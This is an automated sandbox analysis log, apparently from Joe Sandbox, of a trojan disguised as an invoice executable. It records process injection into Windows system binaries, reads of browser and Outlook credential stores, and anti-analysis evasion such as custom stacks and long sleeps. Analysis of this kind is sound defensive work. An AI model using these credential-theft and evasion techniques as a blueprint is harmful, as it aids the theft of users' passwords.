                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_02FCCA9B11_2_02FCCA9B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_02FCD8C811_2_02FCD8C8
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_02FCE80511_2_02FCE805
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: String function: 0021F8A0 appears 35 times
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: String function: 00216AC0 appears 42 times
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: String function: 0020EC2F appears 68 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 0328F290 appears 105 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 031FB970 appears 280 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 03245130 appears 58 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 0327EA12 appears 86 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 03257E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 275 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 100 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 57 times
                Source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000035D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734290.exe
                Source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2164578123.000000000377D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734290.exe
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/3@6/3
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023CE7A GetLastError,FormatMessageW,2_2_0023CE7A
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022AB84 AdjustTokenPrivileges,CloseHandle,2_2_0022AB84
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_0022B134
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_0023E1FD
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00236532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_00236532
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0024C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,2_2_0024C18C
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_001F406B
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeFile created: C:\Users\user\AppData\Local\Temp\aut6F38.tmpJump to behavior
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ktmutil.exe, 0000000B.00000003.2690164539.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2690164539.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3402567248.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3402567248.0000000002E0F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3402567248.0000000002E04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ORIGINAL INVOICE COAU7230734290.exeReversingLabs: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"Jump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"Jump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic file information: File size 1212928 > 1048576
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tOxaspWNamv.exe, 00000008.00000002.3405222238.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409614358.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2163294510.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2391635779.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2389578275.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2502109866.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2504208467.0000000003028000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdbGCTL source: tOxaspWNamv.exe, 00000008.00000003.2433589740.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2163294510.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.2493451391.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2391635779.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2389578275.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 0000000B.00000003.2502109866.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2504208467.0000000003028000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000004.00000002.2493286869.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493265316.0000000003400000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000003.2434247222.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000004.00000002.2493286869.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493265316.0000000003400000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000003.2434247222.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdb source: tOxaspWNamv.exe, 00000008.00000003.2433589740.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412669118.00000000037FC000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000000.2571842961.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.000000001763C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412669118.00000000037FC000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000000.2571842961.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.000000001763C000.00000004.80000000.00040000.00000000.sdmp
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020E01E LoadLibraryA,GetProcAddress,2_2_0020E01E
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020288B push 66002023h; retn 0026h2_2_002028E1
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00216B05 push ecx; ret 2_2_00216B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00416096 push eax; ret 4_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004168B9 push 49A0F8CEh; ret 4_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004160BB push eax; ret 4_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00416970 push 49A0F8CEh; ret 4_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041692F push 49A0F8CEh; ret 4_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004049B6 push cs; iretd 4_2_004049BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004032E0 push eax; ret 4_2_004032E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00415A90 push ds; retf 4_2_00415A93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041938B push ecx; retf 4_2_004193EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00411BB6 push ecx; retf 4_2_00411BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004065E5 push cs; ret 4_2_004065F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00404E33 push ds; iretd 4_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040D6C1 push ebp; retf 4_2_0040D6CA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00404E91 push ds; iretd 4_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A309AD push ecx; mov dword ptr [esp], ecx4_2_03A309B6
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0495E48B push ecx; ret 8_2_0495E4C9
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0496CCBD push eax; ret 8_2_0496CD10
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0496CCE2 push eax; ret 8_2_0496CD10
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0496D4E0 push 49A0F8CEh; ret 8_2_0496D539
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0495E40F push ecx; ret 8_2_0495E4C9
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0496D597 push 49A0F8CEh; ret 8_2_0496D539
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0495B5DD push cs; iretd 8_2_0495B5E1
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0495E517 push ecx; ret 8_2_0495E4C9
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0496D556 push 49A0F8CEh; ret 8_2_0496D539
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0496C6B7 push ds; retf 8_2_0496C6BA
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0495BAB8 push ds; iretd 8_2_0495BA8A
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0495C6FE push ss; retf 8_2_0495C701
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_049642E8 push ebp; retf 8_2_049642F1
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeCode function: 8_2_0495D20C push cs; ret 8_2_0495D217
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00258111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00258111
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0020EB42
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0021123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0021123A
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeAPI/Special instruction interceptor: Address: E27D6C
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A7096E rdtsc 4_2_03A7096E
                Source: C:\Windows\SysWOW64\ktmutil.exeWindow / User API: threadDelayed 9695Jump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeEvaded block: after key decisiongraph_2-92966
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-93736
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 2364Thread sleep count: 279 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 2364Thread sleep time: -558000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 2364Thread sleep count: 9695 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 2364Thread sleep time: -19390000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
